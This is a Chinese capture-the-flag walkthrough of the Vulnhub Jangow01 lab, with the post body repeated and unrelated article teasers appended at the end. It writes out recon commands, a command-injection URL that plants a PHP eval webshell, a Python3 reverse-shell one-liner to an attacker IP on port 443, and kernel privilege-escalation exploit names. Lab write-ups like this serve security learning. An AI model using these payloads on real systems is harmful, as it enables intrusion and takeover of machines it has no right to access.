Vulnhub内网渗透Jangow01靶场通关

news2024/10/5 17:16:23

详细请见个人博客


靶场下载地址。
下载下来后是 .vmdk 格式,vm直接导入。 M1请使用UTM进行搭建,教程见此。该靶场可能出现网络问题,解决方案见此


信息搜集

arp-scan -l		# 主机发现ip为 192.168.168.15
nmap -sV -A -p- 192.168.168.15	# 端口扫描

Pasted Graphic

发现开放了21ftp80http端口,对80端口进行进一步目录扫描

dirsearch -u 192.168.168.15

Pasted Graphic 1

扫描到了一个.backup文件,访问预览一下

$servername = "localhost";
$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);

可以看到这是一个php的配置文件,包含servernamedatabaseusernamepassword,但是这里是localhost,数据库端口并没有对外开放,所以暂时无法利用。

再访问一下/site站点,首页上的Buscar非常可疑,访问后是如下网址:

192.168.168.15/site/busque.php?buscar=

image-20240308161126370

经过测试之后可以命令执行

Pasted Graphic 3

其他信息搜集的差不多了,这里可能会是一个突破口


测试过程

上面扫描出来了ftp服务,尝试使用.backup进行连接

Connected to 192.168.168.15.

连接成功了,也看到了当前站点的文件目录,但是经过测试没有put权限,没有办法上传文件。

站点的命令执行第一个想到的是直接反弹shell,但是经过测试发现似乎无法执行bash和nc等命令

后来发现可以直接使用python3反弹shell

Pasted Graphic 6

为了更好操作,尝试使用echo写入一句话木马,然后使用蚁剑连接

192.168.168.15/site/busque.php?echo '<?php phpinfo();eval($_REQUEST["x"]);?>' > shell.php

Pasted Graphic 5

webshell 虽然赋予我执行命令、管理文件的能力,但毕竟不是真正的 shell,无法执行交互式命令、无法控制进程状态、无法补全命令等等,非常不利于提权操作以及横向移动,所以,必须反弹 shell以执行更多的操作。

尝试了几乎所有的反弹shell命令,都无法成功监听到,后来想到有可能是出站策略中限制了端口。参考这篇文章,尝试了443端口,成功反弹shell。这里需要注意,该靶场没有python命令,而是python3

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.168.5",443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'

Pasted Graphic 8

wordpress

成功反弹到shell后,建立一个交互式终端

python3 -c 'import pty;pty.spawn("/bin/bash");'

由于用户是www-data,也没有开放ssh和mysql权限,之前看到的jangow01账户也没有用。查一下系统内核

uname -a

看到内核是Linux 4.4.0-31,这个内核已经很老了,存在漏洞

searchsploit Ubuntu 4.4.0-31

Pasted Graphic 10

尝试了43418.c44298.c,都无法成功提权

Pasted Graphic 9

后来尝试到45010.c,成功提权了

Pasted Graphic 11

Pasted Graphic 12


总结

这个靶场整体来说都比较常规,除了反弹shell有些困难,需要学习一些知识
)

靶场下载地址。
下载下来后是 .vmdk 格式,vm直接导入。 M1请使用UTM进行搭建,教程见此。该靶场可能出现网络问题,解决方案见此


信息搜集

arp-scan -l		# 主机发现ip为 192.168.168.15
nmap -sV -A -p- 192.168.168.15	# 端口扫描

Pasted Graphic

发现开放了21ftp80http端口,对80端口进行进一步目录扫描

dirsearch -u 192.168.168.15

Pasted Graphic 1

扫描到了一个.backup文件,访问预览一下

$servername = "localhost";
$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);

可以看到这是一个php的配置文件,包含servernamedatabaseusernamepassword,但是这里是localhost,数据库端口并没有对外开放,所以暂时无法利用。

再访问一下/site站点,首页上的Buscar非常可疑,访问后是如下网址:

192.168.168.15/site/busque.php?buscar=

image-20240308161126370

经过测试之后可以命令执行

Pasted Graphic 3

其他信息搜集的差不多了,这里可能会是一个突破口


测试过程

上面扫描出来了ftp服务,尝试使用.backup进行连接

Connected to 192.168.168.15.

连接成功了,也看到了当前站点的文件目录,但是经过测试没有put权限,没有办法上传文件。

站点的命令执行第一个想到的是直接反弹shell,但是经过测试发现似乎无法执行bash和nc等命令

后来发现可以直接使用python3反弹shell

Pasted Graphic 6

为了更好操作,尝试使用echo写入一句话木马,然后使用蚁剑连接

192.168.168.15/site/busque.php?echo '<?php phpinfo();eval($_REQUEST["x"]);?>' > shell.php

Pasted Graphic 5

webshell 虽然赋予我执行命令、管理文件的能力,但毕竟不是真正的 shell,无法执行交互式命令、无法控制进程状态、无法补全命令等等,非常不利于提权操作以及横向移动,所以,必须反弹 shell以执行更多的操作。

尝试了几乎所有的反弹shell命令,都无法成功监听到,后来想到有可能是出站策略中限制了端口。参考这篇文章,尝试了443端口,成功反弹shell。这里需要注意,该靶场没有python命令,而是python3

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.168.5",443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'

Pasted Graphic 8

wordpress

成功反弹到shell后,建立一个交互式终端

python3 -c 'import pty;pty.spawn("/bin/bash");'

由于用户是www-data,也没有开放ssh和mysql权限,之前看到的jangow01账户也没有用。查一下系统内核

uname -a

看到内核是Linux 4.4.0-31,这个内核已经很老了,存在漏洞

searchsploit Ubuntu 4.4.0-31

Pasted Graphic 10

尝试了43418.c44298.c,都无法成功提权

Pasted Graphic 9

后来尝试到45010.c,成功提权了

Pasted Graphic 11

Pasted Graphic 12


总结

这个靶场整体来说都比较常规,除了反弹shell有些困难,需要学习一些知识

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1500376.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

多功能线缆光纤验证器-AEM CV-100

TestPro CV100 多功能电缆验证器 屡获殊荣的 TestPro CV100 多功能电缆验证器专为当今的现代智能建筑网络基础设施而设计。 它提供了当今可用的功能最丰富的测试平台&#xff0c;以及允许定制所需的确切测试套件的基于模块化的平台。 智能建筑测试套件&#xff08;K60 和 K61…

BUUCTF-Misc3

LSB1 1.打开附件 得到一张图片&#xff0c;像是某个大学的校徽 2.Stegsolve工具 根据标题LSB&#xff0c;可能是LSB隐写 放到Stegsolve中&#xff0c;点Analyse在点Data Extract 数据提取 因为是LSB隐写&#xff0c;发现含以.png结尾的图片 3.保存图片 4.得到flag 扫描二维…

蓝桥杯-最长递增

思路及代码详解:(此题为容易题) #include <iostream> using namespace std; int main() {int a[1000]{0};int n,temp;int num0;int count0;cin>>n;for(int i0;i<n;i){cin>>a[i];}//输入数据tempa[0];//设置一个临时比较的存储变量for(int i1;i<n;i){i…

性别和年龄的视频实时监测项目

注意&#xff1a;本文引用自专业人工智能社区Venus AI 更多AI知识请参考原站 &#xff08;[www.aideeplearning.cn]&#xff09; 性别和年龄检测 Python 项目 首先介绍性别和年龄检测的高级Python项目中使用的专业术语 什么是计算机视觉&#xff1f; 计算机视觉是使计算机能…

鸿蒙Harmony应用开发—ArkTS声明式开发(基础手势:DataPanel)

数据面板组件&#xff0c;用于将多个数据占比情况使用占比图进行展示。 说明&#xff1a; 该组件从API Version 7开始支持。后续版本如有新增内容&#xff0c;则采用上角标单独标记该内容的起始版本。 子组件 无 接口 DataPanel(options: DataPanelOptions) 从API version …

MySQL基础-----约束

目录 前言 一、概述 二、约束演示 三、外键约束 1.介绍 2.语法 四、删除/更新行为 1.CASCADE 2.SET NULL 前言 本期我们开始MySQL约束的学习&#xff0c;约束一般是只数据键对本条数据的约束&#xff0c;通过约束我们可以保证数据库中数据的正确、有效性和完整性。 下面…

仿牛客项目Day1

SpringMVC 架构 spring的前端控制器是DispatcherServlet 模板引擎Thymeleaf 这个还不知道干嘛的 mvc演示 get请求 RequestMapping&#xff1a;声明访问路径和http方法get或set什么的 ResponseBody&#xff1a;java对象转为json格式的数据&#xff0c;表示该方法的返回结…

原创+顶级SCI优化!23年新算法PSA优化CNN-LSTM-Attention一键实现多变量回归预测!

声明&#xff1a;文章是从本人公众号中复制而来&#xff0c;因此&#xff0c;想最新最快了解各类智能优化算法及其改进的朋友&#xff0c;可关注我的公众号&#xff1a;强盛机器学习&#xff0c;不定期会有很多免费代码分享~ 目录 效果展示 数据介绍 创新点 模型流程 部…

7款前端实战型项目特效分享(附在线预览)

分享7款实用性的前端动画特效 其中有canvas特效、css动画、svg动画等等 下方效果图可能不是特别的生动 那么你可以点击在线预览进行查看相应的动画特效 同时也是可以下载该资源的 CSS春节灯笼特效 基于CSS实现的灯笼特效 灯笼会朝左右两个方向来回的摆动着 以下效果图只能体现…

调用Mybatis plus中的saveBatch方法报找不到表的问题

1.问题现象 在用Mybatis plus开发的项目中&#xff0c;用自带的API批量保存的方法saveBatch操作时&#xff0c;发现报没有找到表的错误。 错误日志截图如下&#xff1a; 表实际是存在的&#xff0c;且发现其他的方法都没有问题&#xff0c;包括save、update等单个的方法&…

Linux基础命令[13]-nl

文章目录 1. nl 命令说明2. nl 命令语法3. nl 命令示例3.1 不加参数3.2 -b&#xff08;依据样式显示行号&#xff09;3.3 -n&#xff08;格式化行号&#xff09;3.4 -w&#xff08;占位数长度&#xff09;3.5 -i&#xff08;依据数值增长行号&#xff09;3.6 -v&#xff08;定义…

【数据库】数据库学习使用总结

一、数据库介绍 二、数据库系统 1、DB——>存储数据的 2、DBMS——>用来管理数据的 DBMS&#xff1a; 1、DCL 用&#xff1b;用来创建和维护用户账户 2、DDL 数据定义语言 3、DML 用来操作数据 三、DDL 1、操作数据库&#xff08;创建和删除&#xff09; create d…

基于sprinbgoot的火锅店管理系统(程序+数据库+文档)

** &#x1f345;点赞收藏关注 → 私信领取本源代码、数据库&#x1f345; 本人在Java毕业设计领域有多年的经验&#xff0c;陆续会更新更多优质的Java实战项目&#xff0c;希望你能有所收获&#xff0c;少走一些弯路。&#x1f345;关注我不迷路&#x1f345;** 一、研究背景…

vue 在线预览word

1 mammoth 先找的是mammoth这个插件yarn add mammoth,版本是1,7.0 参考网上的示例使用如下&#xff1a; import mammoth from "mammoth"; const vHtml ref("") const readExcelFromRemoteFile (url) >{var xhr new XMLHttpRequest();xhr.open("…

2024年新版CMS内容管理使用,不用回退老版本 使用最新小程序云开发cms内容模型

一&#xff0c;问题描述 最近越来越多的同学找石头哥&#xff0c;说cms用不了&#xff0c;其实是小程序官方最近又搞大动作了&#xff0c;偷偷的升级的云开发cms&#xff08;内容管理&#xff09;以下都称cms&#xff0c;不升级不要紧&#xff0c;这一升级&#xff0c;就导致我…

浅谈去耦电容的作用、选择、布局及其它电容的区别!

在一些文章资料中&#xff0c;去耦电容器被认为是旁路电容器。在其他资料中&#xff0c;去耦电容和旁路电容的区别在于&#xff1a;“旁路电容以输入信号中的干扰为滤波对象&#xff0c;而去耦电容以输出信号的干扰为滤波对象&#xff0c;防止干扰信号返回到输出端。”力量。”…

光耦合器概述

在电子元件领域&#xff0c;很少有器件能像光耦合器那样发挥如此重要的作用。这些巧妙的组件通过巧妙地使用光波促进电信号的传输&#xff0c;确保输入和输出电路之间的重要分离。让我们深入研究光耦合器的世界&#xff0c;探索它们的应用、工作原理以及在电子系统中的意义。 …

【CSP试题回顾】202109-1-数组推导

CSP-202109-1-数组推导 解题代码 #include<iostream> #include<vector> #include<algorithm> using namespace std;long long maxSum, minSum;int main() { int n;cin >> n;vector<int>B(n);for (auto& it : B){cin >> it;maxSum …

#14vue3生成表单并跳转到外部地址的方式

1、背景 后端返回的json数据中包含一个json数组&#xff0c;此数组中是目标跳转地址所需要的form表单的数据。 2、跳转前的页面 const goto () > {finish.value true;request.post(/xxx/yyy,{zzz: zzz.value}).then(res > {const url res.data.submitUrlconst params…

微信小程序可拖拽视频播放案例

微信小程序可拖拽视频播放案例 如图所示 使用原生小程序组件 movable-area movable-view 注意movable-view必须在area内 官方组件地址 wxml <movable-area class"movableArea"><movable-view class"movableView" out-of-bounds"false&q…